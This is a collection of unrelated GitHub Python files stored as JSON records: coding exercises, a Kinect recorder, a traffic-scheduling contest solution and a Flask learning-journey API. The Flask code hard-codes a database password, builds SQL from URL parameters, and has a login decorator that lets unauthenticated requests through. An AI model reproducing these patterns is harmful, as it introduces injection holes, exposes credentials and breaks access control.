setts_list[back + 1][1]\r\n if fron_part_id != 'False' and fron_part_id != None:\r\n links_front = baseTools.take_links(base, fron_part_id)\r\n for _ in range(len(links_front) * 5):\r\n word_ID_pick_left = 
pick_side_part(setts[back -1], links_front)\r\n if word_ID_pick_left != 'False':\r\n if not word_ID_pick_left in choice_list:\r\n choice_list.append(word_ID_pick_left)\r\n \r\n break\r\n setts_list[back - 1][1] = word_ID_pick_left\r\n else: break\r\n # print(choice_list)\r\n final_list = []\r\n for ex in setts_list:\r\n if ex[1] != 'False' and ex[1] != None:\r\n if not ex[1] in final_list:\r\n final_list.append(ex[1]) \r\n\r\n final_string = ''\r\n # print(setts_list)\r\n for ex in final_list:\r\n if ex != 'False' and ex != None:\r\n final_string += f'{baseTools.take_word(base, ex)} '\r\n final_string = final_string[:len(final_string) -1]\r\n\r\n return final_string\r\n\r\ndef check_list_to_list(item_list, checking_list):\r\n on_the_list = False\r\n for item in item_list:\r\n if item in checking_list:\r\n on_the_list = True\r\n return on_the_list\r\n\r\ndef sentens_generator_AI(base, sentens):\r\n 'finds words in a specific grammatical case in sentences and joins two sentences together'\r\n 'does not work well because it produces nonsense'\r\n sentens = action.string_cleaner(sentens)\r\n sentens_list = sentens.split(' ')\r\n PO_DO = []\r\n final_set = set()\r\n wor_dict = {}\r\n for word in sentens_list:\r\n word_ids = checkerBaseOperators.find_pharse_in_part(base, word)\r\n wor_dict[word] = []\r\n wor_dict[word] += word_ids\r\n for wi in word_ids:\r\n if wi.startswith('PO') or wi.startswith('DO') or wi.startswith('OR')\\\r\n or wi.startswith('PR') or wi.startswith('OK') or wi.startswith('OZ'):\r\n PO_DO.append(wi)\r\n\r\n se_LIST = []\r\n mem_dict = {}\r\n for p in PO_DO:\r\n gener = generator_AI_most_popular(base, p, 3, 'HW')\r\n gs = gener['STRING']\r\n final_set.add(gs)\r\n se_LIST.append(gener['ID'])\r\n mem_dict[gs] = gener['ID']\r\n\r\n export_list = []\r\n for gen in final_set:\r\n se_SET = set()\r\n for x in checkerBaseOperators.searcher_phrase(base, gen):\r\n se_SET.add(x)\r\n if len(se_SET) > 1:\r\n sides = []\r\n se_left = set()\r\n se_right= set()\r\n for se_i in se_SET:\r\n se_words = baseTools.take_se(base, se_i)\r\n for sl in se_words:\r\n for se_l in se_LIST:\r\n if sl == se_l[0]:\r\n se_left.add(se_i)\r\n sides += [se_l[0]]\r\n if sl == se_l[len(se_l) - 1]:\r\n se_right.add(se_i)\r\n sides += [se_l[len(se_l) - 1]]\r\n\r\n l_len = len(se_left)\r\n r_len = len(se_right)\r\n if l_len > 0 and r_len > 0:\r\n se_le = se_left.intersection(se_right)\r\n se_ri = se_right.intersection(se_left)\r\n if len(se_ri) == 0: se_ri = se_le\r\n counter_left = 0\r\n sentens_left = None\r\n for ssl in se_le:\r\n left_len = len(ssl)\r\n if left_len > counter_left:\r\n sentens_left = ssl\r\n # print('before', sentens_left, se_ri)\r\n if len(se_ri) > 0 and sentens_left != None:\r\n se_ri.remove(sentens_left)\r\n if len(se_ri) == 0:\r\n se_ri = se_le\r\n # print('after', sentens_left, se_ri)\r\n counter_right = 0\r\n sentens_right = None\r\n for ssr in se_ri:\r\n right_len = len(ssr)\r\n if right_len > counter_right:\r\n sentens_right = ssr\r\n if sentens_left != None and sentens_right != None:\r\n left_word_id = mem_dict[gen][0]\r\n right_word_id = mem_dict[gen][len(mem_dict[gen]) -1]\r\n left_sentens_ids = baseTools.take_se(base, sentens_left)\r\n right_sentens_ids = baseTools.take_se(base, sentens_right)\r\n\r\n if left_word_id in left_sentens_ids:\r\n left_sentens_ids = left_sentens_ids[:left_sentens_ids.index(left_word_id)]\r\n else: left_sentens_ids = []\r\n if right_word_id in right_sentens_ids:\r\n right_sentens_ids = right_sentens_ids[right_sentens_ids.index(right_word_id) + 1:]\r\n else: right_sentens_ids = []\r\n 
ready_list = left_sentens_ids + mem_dict[gen] + right_sentens_ids\r\n ready_string = ''\r\n for wo in ready_list:\r\n ready_string += f'{baseTools.take_word(base, wo)} '\r\n exp = ready_string[:len(ready_string) - 1].capitalize() + '.'\r\n export_list.append(exp)\r\n\r\n return {\r\n 'LIST' : export_list, \r\n 'DICT-ID' : mem_dict, \r\n 'SENTENS' : sentens, \r\n 'WORDS' : wor_dict, \r\n }\r\n\r\nif __name__ == '__main__':\r\n import awareness\r\n base = awareness.take_base('memory_CLO_v2010')\r\n print(sentens_generator_AI(base, 'łączy dwa zdania ze sobą'))\r\n ","repo_name":"amnezja3/awareness","sub_path":"addionalisAwe.py","file_name":"addionalisAwe.py","file_ext":"py","file_size_in_byte":14828,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15273963811","text":"from collections import deque\n\nN, M = map(int, input().split())\npatient = deque([(key, val) for key, val in enumerate(list(map(int, input().split())))])\n\ncnt = 0\nwhile True:\n cur = patient.popleft()\n if any(cur[1] < x[1] for x in patient):\n patient.append(cur)\n else:\n cnt += 1\n if cur[0] == M:\n break\nprint(cnt)\n\n'''\n5 2\n60 50 70 80 90\n'''\n\n","repo_name":"gkdbssla97/Python-Coding-Test","sub_path":"CodingProblem/응급실_1.py","file_name":"응급실_1.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20793101376","text":"for _ in range(int(input())):\r\n l = list(map(str, input().split()))\r\n k = int(l[0])\r\n flag = 0\r\n for i in range(k):\r\n if l[i+1].islower():\r\n if not(all(ord(j) in range(97,110) for j in l[i+1])):\r\n flag = 1\r\n break\r\n elif l[i+1].isupper():\r\n if not(all(ord(j) in range(78,91) for j in l[i+1])):\r\n flag=1\r\n break\r\n else:\r\n flag = 1\r\n break\r\n if flag==0:\r\n print(\"YES\")\r\n else:\r\n print(\"NO\")\r\n \r\n","repo_name":"Harshala-Gaikwad/Programming","sub_path":"codechef/correct_sentence.py","file_name":"correct_sentence.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"748746520","text":"__author__ = '562474'\n\nimport inspect\nimport logging\nimport sys\nimport time\n\n\n\n\nclass LogThisTestCase(type):\n \"\"\"\n http://stackoverflow.com/a/15969985\n \"\"\"\n\n def __new__(cls, name, bases, dct):\n # if the TestCase already provides setUp, wrap it\n if 'setUp' in dct:\n setUp = dct['setUp']\n else:\n setUp = lambda self: None\n # print \"creating setUp...\"\n\n def wrappedSetUp(self):\n for hdlr in self.logger.handlers:\n self.logger.removeHandler(hdlr)\n # self.formatter = logging.Formatter('%(asctime)s-%(name)s-%(levelname)s-%(lineno)d: %(message)s', datefmt=\"%Y-%m-%dT%H:%M:%S\")\n self.formatter = logging.Formatter('%(message)s')\n self.hdlr = logging.StreamHandler(stream=sys.stdout)\n self.hdlr.setLevel(logging.DEBUG)\n self.hdlr.setFormatter(self.formatter)\n self.logger.addHandler(self.hdlr)\n\n currentTest = self.id().split('.')[-1]\n callingFunction = inspect.stack()[1][3]\n self.logger.info(\"============Starting %s============\\n\", currentTest)\n setUp(self)\n\n dct['setUp'] = wrappedSetUp\n\n # same for tearDown\n if 'tearDown' in dct:\n tearDown = dct['tearDown']\n else:\n tearDown = lambda self: None\n\n def wrappedTearDown(self):\n tearDown(self)\n self.logger.info(\"\\n============================================\\n\")\n self.logger.removeHandler(self.hdlr)\n\n dct['tearDown'] = 
wrappedTearDown\n\n # return the class instance with the replaced setUp/tearDown\n return type.__new__(cls, name, bases, dct)\n\n","repo_name":"OSADP/SEMI-ODE","sub_path":"ode/Development/emulatedClientApps/SituationalDataApp/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42448975820","text":"from cloudbot import hook\nimport json\nfrom fuzzywuzzy import process\n\n@hook.command(\"win10\", permissions=[\"rulesuser\"], autohelp=False)\ndef win10(text, message):\n    with open('data/win10.json') as data_file: \n        terms = json.load(data_file)\n    terms = terms['issues']\n    data_file.close()\n\n    text,ratio = process.extractOne(text.lower(), terms.keys())\n    print(text)\n    return terms.get(text, \"Tip not found.\")\n","repo_name":"pierut/robocop4","sub_path":"plugins/private_win10.py","file_name":"private_win10.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28714177451","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 22 23:48:55 2022\r\n\r\n@author: yonau\r\n\"\"\"\r\n\r\nimport numpy as np\r\n\r\ndef fonction(x):\r\n    return x**5 -5*x**3 -20*x +5\r\n\r\ndef signeplz(x,s,signe):\r\n    \"\"\"\r\n    The signeplz function returns the direction of travel: \r\n    to the right or to the left. \r\n    \r\n    \"\"\"\r\n    \r\n    if signe == '+':\r\n        #if we move in the + direction (to the right): x_i=x_(i-1)+s\r\n        return x+s\r\n    else:\r\n        #if we move in the - direction (to the left): x_i=x_(i-1)-s\r\n        return x-s\r\n    \r\ndef pas_fixe(x0,s,optimum):\r\n    \"\"\"\r\n    The pas_fixe function is an optimisation method that returns \r\n    the point x_i (or x*) that can be considered the optimal point.\r\n    The optimum can be a maximisation or a minimisation point. \r\n    The pas_fixe function assumes unimodality of the function defined above\r\n    \r\n    INPUT x0: starting point\r\n    INPUT s: fixed step size \r\n    INPUT optimum: maximisation or minimisation \r\n    OUTPUT table: table of the iterations and final result of the optimisation\r\n    \r\n    \"\"\"\r\n    x = x0\r\n    initilisation = fonction(x0+s)\r\n    \r\n    if optimum == 'mini':\r\n        if initilisation < fonction(x0):\r\n            signe = '+'\r\n        else:\r\n            signe = '-'    \r\n    \r\n    elif optimum == 'maxi':\r\n        if initilisation < fonction(x0):\r\n            signe = '-'\r\n        else:\r\n            signe = '+'\r\n    \r\n    liste_antecedants = []\r\n    liste_images = []\r\n    \r\n    if optimum == 'mini':\r\n        #for a minimisation\r\n        while fonction(signeplz(x,s,signe)) < fonction(x):\r\n            liste_antecedants.append(x)\r\n            liste_images.append(fonction(x))\r\n            x = signeplz(x,s,signe) \r\n            \r\n        liste_antecedants.append(x)\r\n        liste_images.append(fonction(x))\r\n        x = signeplz(x,s,signe)\r\n        liste_antecedants.append(x)\r\n        liste_images.append(fonction(x))\r\n        i = liste_images.index(min(liste_images))    \r\n        \r\n    elif optimum == 'maxi':\r\n        #for a maximisation\r\n        while fonction(signeplz(x,s,signe)) > fonction(x):\r\n            liste_antecedants.append(x)\r\n            liste_images.append(fonction(x))\r\n            x = signeplz(x,s,signe)\r\n            \r\n        liste_antecedants.append(x)\r\n        liste_images.append(fonction(x))\r\n        x = signeplz(x,s,signe)\r\n        liste_antecedants.append(x)\r\n        liste_images.append(fonction(x))\r\n        i = liste_images.index(max(liste_images))\r\n    \r\n    table=np.zeros((len(liste_images),4))\r\n    \r\n    \r\n    if optimum == 'mini':\r\n        print('\n************ MINIMISATION: **********')\r\n        #numpy does not allow mixing str and float types, so here are the column names:\r\n        #the last column is the boolean: 1 if true, 0 if false\r\n        print('\n','iteration_i ','x_i ','f(x_i) ',' f(x_i)>f(x_i-1)')\r\n        for i in range(len(liste_images)):\r\n            table[i,0]=i\r\n            table[i,1]=liste_antecedants[i]\r\n            table[i,2]=liste_images[i]\r\n            ouinon=liste_images[i]>liste_images[i-1]\r\n            table[i,3]=ouinon\r\n    elif optimum == 'maxi':\r\n        print('\n********** MAXIMISATION:*********')\r\n        print('\n','iteration_i ','x_i ','f(x_i) ',' f(x_i) matrix[mid][-1]:\n            top = mid + 1\n        elif target < matrix[mid][0]:\n            bot = mid - 1\n        else:\n            break\n\n\n    # Do binary search on the respective matrix\n    if not (top <= bot):\n        return False\n    \n    row = (top + bot) // 2\n    l, r = 0, COLS - 1\n    while l <= r:\n        m = (l + r) // 2\n        if target > matrix[row][m]:\n            l = m + 1\n        elif target < matrix[row][m]:\n            r = m - 1\n        else:\n            return True\n    return False\n\nmatrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]\n\nprint(binary_search_2d(matrix, 8))","repo_name":"Paulvitalis200/Data-Structures","sub_path":"BinaryTrees/binary_search_2d_rev.py","file_name":"binary_search_2d_rev.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19173277442","text":"import pykka\nimport time\n\n\nclass TimerActor(pykka.ThreadingActor):\n    "actor that periodically sends a message to target \\\n    inspired by: \\\n    https://github.com/jodal/pykka/issues/24"\n\n    def __init__(self, target, sleep_time, event):\n        super(TimerActor, self).__init__()\n        self.target = target\n        self.sleep_time = sleep_time\n        self.event = event\n        self.running = False\n\n    def on_receive(self, msg):\n\n        if msg.get('cmd') == 'start':\n            self.running = True\n            self.trigger()\n        elif msg.get('cmd') == 'stop':\n            self.running = False\n        elif msg.get('cmd') == 'trigger':\n            self.trigger()\n\n    def trigger(self):\n        if 
not self.running:\r\n            return\r\n        time.sleep(self.sleep_time)\r\n        self.target.tell({'cmd': self.event})\r\n        self.actor_ref.tell({'cmd': 'trigger'})\r\n","repo_name":"cvra/korra-the-coordinator","sub_path":"korra/TimerActor.py","file_name":"TimerActor.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10718852232","text":"from functools import wraps\n\nfrom flask import g, request, jsonify\n\nfrom .error import Code\n\n\ndef login_required(f):\n    @wraps(f)\n    def wrapper(*args, **kwargs):\n        if g.user is None:\n            return jsonify(dict(code=Code.OK.value, msg='ok'))\n        return f(*args, **kwargs)\n    return wrapper","repo_name":"bithaolee/flask-framework","sub_path":"app/core/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28363288533","text":"\"\"\"\nAuthor: Konstantinos Angelopoulos\nDate: 04/02/2020\nAll rights reserved.\nFeel free to use and modify and if you like it give it a star.\n\"\"\"\n\n# *modified for testing by N. Vickery on 11/7/22\n\nfrom pykinect2 import PyKinectV2\nfrom pykinect2.PyKinectV2 import *\nfrom pykinect2 import PyKinectRuntime\nimport cv2\nimport numpy as np\n\nkinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Depth | PyKinectV2.FrameSourceTypes_Color)\n\n# Define the codec and create VideoWriter object\nfourcc = cv2.VideoWriter_fourcc('X','V','I','D')\ncolor_H,color_W = kinect.color_frame_desc.Height, kinect.color_frame_desc.Width\nrgb_vid = cv2.VideoWriter('rgb_output.mp4', fourcc, 30.0, (color_W,color_H))\nprint(color_H,color_W)\n#depth_vid = cv.VideoWriter('depth_output.avi', fourcc, 30.0, (512, 424))\n# Adjust parameters above for kinect video feed (look it up)\n\nwhile True:\n    if kinect.has_new_depth_frame():\n        # RGB Image\n        color_frame = kinect.get_last_color_frame()\n        colorImage = color_frame.reshape((kinect.color_frame_desc.Height, kinect.color_frame_desc.Width, 4)).astype(np.uint8)\n        colorImage = cv2.flip(colorImage, 1)\n        #print(colorImage.shape)\n        img_BGR = cv2.cvtColor(colorImage,cv2.COLOR_RGB2BGR)\n        rgb_vid.write(img_BGR)\n        #rgb_vid.write(colorImage)\n        cv2.imshow('Test Color View', cv2.resize(colorImage, (int(1920 / 2.5), int(1080 / 2.5))))\n        # Depth Image\n##        depth_frame = kinect.get_last_depth_frame()\n##        depth_img = depth_frame.reshape((kinect.depth_frame_desc.Height, kinect.depth_frame_desc.Width)).astype(np.uint16)\n##        depth_img = cv2.flip(depth_img, 1)\n##        cv2.imshow('Test Depth View', depth_img)\n##        depth_vid.write(depth_img)\n        # Infrared Image\n##        infrared_frame = kinect.get_last_infrared_frame()\n##        infrared_img = infrared_frame.reshape((kinect.infrared_frame_desc.Height, kinect.infrared_frame_desc.Width)).astype(np.uint8)\n##        infrared_img = cv2.flip(infrared_img, 1)\n##        cv2.imshow('Test Infrared View', infrared_img)\n        # print(color_point_2_depth_point(kinect, _DepthSpacePoint, kinect._depth_frame_data, [100, 100]))\n        # print(depth_points_2_world_points(kinect, _DepthSpacePoint, [[100, 150], [200, 250]]))\n        # print(intrinsics(kinect).FocalLengthX, intrinsics(kinect).FocalLengthY, intrinsics(kinect).PrincipalPointX, intrinsics(kinect).PrincipalPointY)\n        # print(intrinsics(kinect).RadialDistortionFourthOrder, intrinsics(kinect).RadialDistortionSecondOrder, intrinsics(kinect).RadialDistortionSixthOrder)\n        # print(world_point_2_depth(kinect, _CameraSpacePoint, [0.250, 0.325, 1]))\n        # img = depth_2_color_space(kinect, 
_DepthSpacePoint, kinect._depth_frame_data, show=False, return_aligned_image=True)\n # depth_2_color_space(kinect, _DepthSpacePoint, kinect._depth_frame_data, show=True)\n # img = color_2_depth_space(kinect, _ColorSpacePoint, kinect._depth_frame_data, show=True, return_aligned_image=True)\n\n # Quit using q\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n\nrgb_vid.release()\n\ncv2.destroyAllWindows()\n","repo_name":"nvickery/CS549---CV-Project-","sub_path":"Archive/Kinect Testing/pykinect2_savingRGBandDepth_test1.py","file_name":"pykinect2_savingRGBandDepth_test1.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"35326259315","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.db.models.functions import Lower\n\nfrom meal.models import (\n COMPONENT_GROUP_CHOICES_MAIN_DISH, Component, Ingredient)\n\n\nclass DishIngredientsForm(forms.Form):\n maindish = forms.ModelChoiceField(\n label=_(\"Today's main dish:\"),\n queryset=Component.objects.order_by(Lower('name')).filter(\n component_group=COMPONENT_GROUP_CHOICES_MAIN_DISH),\n widget=forms.Select(attrs={'class': 'ui dropdown maindish'}),\n )\n\n ingredients = forms.ModelMultipleChoiceField(\n label=_('Select main dish ingredients:'),\n queryset=Ingredient.objects.order_by(Lower('name')).all(),\n widget=forms.SelectMultiple(\n attrs={'class': 'ui fluid search dropdown mainingredients'}),\n required=False,\n )\n\n sides_ingredients = forms.ModelMultipleChoiceField(\n label=_('Select sides ingredients:'),\n queryset=Ingredient.objects.order_by(Lower('name')).all(),\n widget=forms.SelectMultiple(\n attrs={'class': 'ui fluid search dropdown sidesingredients'}),\n required=False,\n )\n\n def clean_sides_ingredients(self):\n data = self.cleaned_data['sides_ingredients']\n if not data:\n raise forms.ValidationError(\n _(\"Please choose some Sides ingredients\"))\n return data\n","repo_name":"savoirfairelinux/sous-chef","sub_path":"src/delivery/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"17939842501","text":"import logging\nimport sys\nimport HandleFile\nimport GridMap\nimport Graph\nimport Processing\nimport math\n\nlogging.basicConfig(level=logging.DEBUG,\n filename='../logs/CodeCraft-2019.log',\n format='[%(asctime)s] %(levelname)s [%(funcName)s: %(filename)s, %(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filemode='a')\n\n\n# python CodeCraft-2019.py ../config/car.txt ../config/road.txt ../config/cross.txt ../config/presetAnswer.txt ../config/answer.txt\ndef main():\n if len(sys.argv) != 6:\n logging.info('please input args: car_path, road_path, cross_path, answerPath')\n exit(1)\n\n car_path = sys.argv[1]\n road_path = sys.argv[2]\n cross_path = sys.argv[3]\n preset_answer_path = sys.argv[4]\n answer_path = sys.argv[5]\n\n # car_path = \"../config/car.txt\"\n # road_path = \"../config/road.txt\"\n # cross_path = \"../config/cross.txt\"\n # preset_answer_path = \"../config/presetAnswer.txt\"\n # answer_path = \"../config/answer.txt\"\n #\n # car_path = \"../config_1/car.txt\"\n # road_path = \"../config_1/road.txt\"\n # cross_path = \"../config_1/cross.txt\"\n # preset_answer_path = \"../config_1/presetAnswer.txt\"\n # answer_path = \"../config_1/answer.txt\"\n\n logging.info(\"car_path is %s\" % (car_path))\n logging.info(\"road_path is 
%s\" % (road_path))\n logging.info(\"cross_path is %s\" % (cross_path))\n logging.info(\"preset_answer_path is %s\" % (preset_answer_path))\n logging.info(\"answer_path is %s\" % (answer_path))\n\n # to read input file\n car, road, cross, preset_answer = HandleFile.read_all_data(car_path, road_path, cross_path, preset_answer_path)\n\n # 分开调参,每秒发车数量\n if 90761 in car:\n dis = 1\n step = 82\n step2 = 100\n time_step = 10\n else:\n dis = 2\n step = 64\n step2 = 64\n time_step = 9\n\n car_time = Processing.compute_pre_car(preset_answer, step) # 为预置车辆设置出发时间\n preset_answer_cross = Processing.judge_pre_cross(car, preset_answer, cross) # 预置车辆的方向统计,按时间统计\n\n # 地图一后10%的车辆提出,重新安排路径,地图二不处理预置车辆\n if dis == 1:\n pre_num = 0\n for t in preset_answer:\n pre_num = pre_num + len(preset_answer[t])\n pre_original_num = int(pre_num/10) # 可处理预置车辆的个数\n preset_answer_time = list(preset_answer.keys())\n preset_answer_time.sort(reverse=True)\n pre_original = {} # 可处理预置车辆统计\n end_time = 1000 # 预置车辆最大出发时间(地图2)\n for i in range(len(preset_answer_time)):\n t = preset_answer_time[i]\n if pre_original_num <= 0:\n break\n end_time = t\n pre_original[t] = {}\n if len(preset_answer[t]) <= pre_original_num:\n for key in preset_answer[t]:\n pre_original[t][key] = 0\n pre_original_num = pre_original_num - len(preset_answer[t])\n del preset_answer[t] # 将重新设置路径的预置车辆从preset_answer中删除\n else:\n delete = []\n for key in preset_answer[t]:\n if pre_original_num > 0:\n delete.append(key)\n pre_original[t][key] = 0\n pre_original_num = pre_original_num - 1\n else:\n break\n for j in range(len(delete)):\n key = delete[j]\n del preset_answer[t][key]\n pass\n # process\n map_cross = Graph.build_map_equal(road, cross) # 设置地图\n\n map_grid = GridMap.grid_map(road, cross) # 路口到坐标的映射\n cross_list = GridMap.cross_sort(map_grid) # 对路口进行排序,离得近的路口在排序中离得尽量远\n\n road_importance = Processing.road_import(road) # 每条路的重要性\n time_group, max_time = Processing.time_grouping(car) # 按时间分组结果以及出发的最大时间\n\n # 结果 {车标号:{预计出发时间,[路口],[路径],实际出发时间}}\n answer = Processing.initialize_answer(car)\n\n # 预置车辆最大出发时间(地图2)\n max_pre_time = max(preset_answer_cross.keys())\n shortest_path = Graph.compute_shortest_path(map_cross) # 两个路口之间最短路查询\n car_flag = {} # 当前可出发的全部车辆\n bias = dict(zip(cross.keys(), [0 for n in range(len(cross))])) # 每个路口当前跑的车数\n # 最大出发时间内,按时间迭代\n for t in range(1, max_time + 1):\n print(t)\n # 若当前时间有预置车辆,修改路的权重和bias\n if t in preset_answer:\n Processing.modify_weight(map_cross, preset_answer[t], road, road_importance, car)\n for c in preset_answer_cross[t]:\n bias[c] = bias[c] + preset_answer_cross[t][c]\n # 地图一,修改预置车辆的路径\n if dis == 1:\n if t in pre_original:\n for key in pre_original[t]:\n path = Graph.dijkstra(map_cross, car[key][0], car[key][1])\n l = math.log(len(path[0]) - 1, 7)\n for j in range(len(path[0]) - 1):\n start = path[0][j]\n end = path[0][j + 1]\n map_cross[start][end][0] = map_cross[start][end][0] + road_importance[path[1][j]]\n answer[key] = [car[key][3]]\n answer[key] = answer[key] + path\n answer[key].append(t)\n # 若当前时间有车出发,添加当前可出发辆\n if t in time_group:\n Processing.compute_car_flag(car_flag, car, shortest_path, time_group, t, map_grid)\n # 若预置车辆占了最大出发车辆的名额,不发其它的车\n if car_time[t] >= step:\n continue\n # 当前可出发车辆按照路口分组\n group = Processing.grouping_up_down3(car_flag, cross, car)\n # 按照平均原则补偿bias,出发上或下的车辆\n Processing.modify_answer1(answer, group, car_flag, map_cross, car, step-car_time[t], t, road_importance, bias, cross_list)\n\n group = Processing.grouping_up_down3(car_flag, cross, car)\n # position = dict(zip(map_cross.keys(), [0 
for n in range(len(map_cross))]))\n    pointer = 0\n    for t in range(max_time+1, 10000):\n        print(t)\n        # once all preset cars have departed, increase the per-second dispatch rate\n        if dis == 1:\n            if t > end_time and t % time_step == 0:\n                step = step + 1\n                if step > step2:\n                    step = step2\n        else:\n            if t > max_pre_time and t % time_step == 0:\n                step = step + 1\n                if step > step2:\n                    step = step2\n\n        # if preset cars depart at this time, update the road weights and the bias\n        if t in preset_answer:\n            Processing.modify_weight(map_cross, preset_answer[t], road, road_importance, car)\n            for c in preset_answer_cross[t]:\n                bias[c] = bias[c] + preset_answer_cross[t][c]\n        if dis == 1:\n            if t in pre_original:\n                for key in pre_original[t]:\n                    path = Graph.dijkstra(map_cross, car[key][0], car[key][1])\n                    l = math.log(len(path[0]) - 1, 7)\n                    for j in range(len(path[0]) - 1):\n                        start = path[0][j]\n                        end = path[0][j + 1]\n                        map_cross[start][end][0] = map_cross[start][end][0] + road_importance[path[1][j]]\n                    answer[key] = [car[key][3]]\n                    answer[key] = answer[key] + path\n                    answer[key].append(t)\n        # dispatch step - car_time[t] cars\n        pointer_s = pointer+step-car_time[t]\n        # compensate the bias evenly and dispatch cars from each crossing\n        flag = Processing.modify_answer2(answer, group, map_cross, car, t, pointer, pointer_s, road_importance, bias, cross_list)\n        if flag == 0:\n            break\n        pointer = pointer_s\n    # print(answer)\n\n    # to write output file\n    HandleFile.write_data(answer, answer_path)\n\n\nif __name__ == "__main__":\n    main()\n","repo_name":"ttinch/Huawei-CodeCraft2019","sub_path":"SDK_python/CodeCraft-2019/src/CodeCraft-2019.py","file_name":"CodeCraft-2019.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"5418551553","text":"from flask import Flask, request, jsonify, Blueprint\nfrom flask_cors import CORS\nimport mysql.connector as mysql\n\nljManagementFunctions = Blueprint('ljManagementFunctions', __name__)\n\n# enter your server IP address/domain name\nHOST = "database-1.cmqbhk3xoixj.ap-southeast-1.rds.amazonaws.com" # or "domain.com"\n# database name, if you want just to connect to MySQL server, leave it empty\nDATABASE = "spmDB"\n# "is212_example, spmDB"\n# this is the user you create\nUSER = "admin"\n# user password\nPASSWORD = "spmspmspm"\n# connect to MySQL server\ndb_connection = mysql.connect(host=HOST, database=DATABASE, user=USER, password=PASSWORD)\nprint("Connected to:", db_connection.get_server_info())\n# enter your code here!\n\ncursor = db_connection.cursor()\n\nCORS(ljManagementFunctions)\n\n# --------- Staff Learning Journey Creation Functions ---------\n# --------------------------- Start ---------------------------\n# [START] Function to GET all skills based on specified Learning Journey role ID\n@ljManagementFunctions.route("/view_skills/<ljRole_Id>")\ndef view_skills(ljRole_Id):\n    # get relevant skills ID matched with roleId\n    skillsId = get_skills_id(ljRole_Id)\n    \n    skillsIdQuery = "("\n    for item in skillsId:\n        skillsIdQuery += str(item[0]) + ","\n    skillsIdQuery = skillsIdQuery[:-1]\n    skillsIdQuery += ")"\n    # get skills that match skills id retrieved earlier and are active \n    query = "SELECT * FROM Skill WHERE skill_id in" + str(skillsIdQuery)\n    cursor.execute(query)\n    skills = cursor.fetchall()\n    return jsonify(\n        {\n            "data": skills\n        }\n    ), 200\n# [END] Function to GET all skills based on specified Learning Journey role ID\n\n# [START] Function to GET active courses based on specified course ID\ndef getCourseByID(course_id):\n    query = "SELECT DISTINCT * FROM Course WHERE course_status='Active' " + "AND course_id 
='\" + str(course_id)+\"'\"\n cursor.execute(query)\n # print(cursor.fetchall())\n return cursor.fetchall()\n# [END] Function to GET active courses based on specified course ID\n\n# [START] Function to GET courses ID bsed on a specific skill ID\ndef get_course_by_skillId(skillId):\n query = \"SELECT course_id FROM Course_Skill WHERE skill_id=\" + str(skillId)\n cursor.execute(query)\n return cursor.fetchall() \n# [END] Function to GET courses ID based on a specific skill ID\n\n# [START] Function to GET skill description and courses based on a specified skill ID\n@ljManagementFunctions.route(\"/view-course-skills/\")\ndef skill_by_course(skillID):\n courseUnderSkill = get_course_by_skillId(skillID)\n query = \"SELECT skill_desc FROM Skill WHERE skill_id =\" + str(skillID)\n cursor.execute(query)\n skill = cursor.fetchall()\n print(courseUnderSkill)\n courses = []\n for id in courseUnderSkill:\n # check if function returns empty list\n if getCourseByID(id[0]) != []:\n courses.append(getCourseByID(id[0]))\n return jsonify(\n {\n \"data\": courses,\n \"skill\":skill\n }\n )\n# [END] Function to GET courses based on a specified skill ID\n\n# [START] Function to get staff learning journey\ndef get_all_staff_lj(staffId):\n query = \"SELECT * FROM LearningJourney WHERE staff_id=\" + str(staffId)\n cursor.execute(query)\n return cursor.fetchall()\n# [END] Function to get staff learning journey\n\n# [START] Function to GET nested list of Unselected and Selected active roles\n@ljManagementFunctions.route(\"/view_filteredLjRoles/\")\ndef view_filteredRoles(staffId):\n data = get_all_staff_lj(staffId)\n existingRoleId = []\n for i in data:\n existingRoleId.append(i[2])\n # get all active roles where active = 0\n query = \"SELECT * FROM LJRole WHERE status = 1\"\n cursor.execute(query)\n ljRoles = cursor.fetchall()\n ljFilteredRoles = []\n existingRoles = []\n \n for role in ljRoles:\n # get roles that are not in existing learning journeys\n if role[0] not in existingRoleId:\n ljFilteredRoles.append(role)\n else:\n existingRoles.append(role)\n return jsonify(\n {\n \"data\": (ljFilteredRoles, existingRoles)\n }\n ), 200\n# [END] Function to GET nested list of Unselected and Selected active roles\n\n# [START] Function to GET relevant skills ID for a specific role ID\ndef get_skills_id(ljRole_Id):\n query1=\"SELECT skill_id FROM LJRole_Skill WHERE ljrole_id = \" + str(ljRole_Id)\n cursor.execute(query1)\n return cursor.fetchall()\n# [END] Function to GET relevant skills ID for a specific role ID\n\n# [START] Function to GET active skill details for a specified list of skills ID\ndef 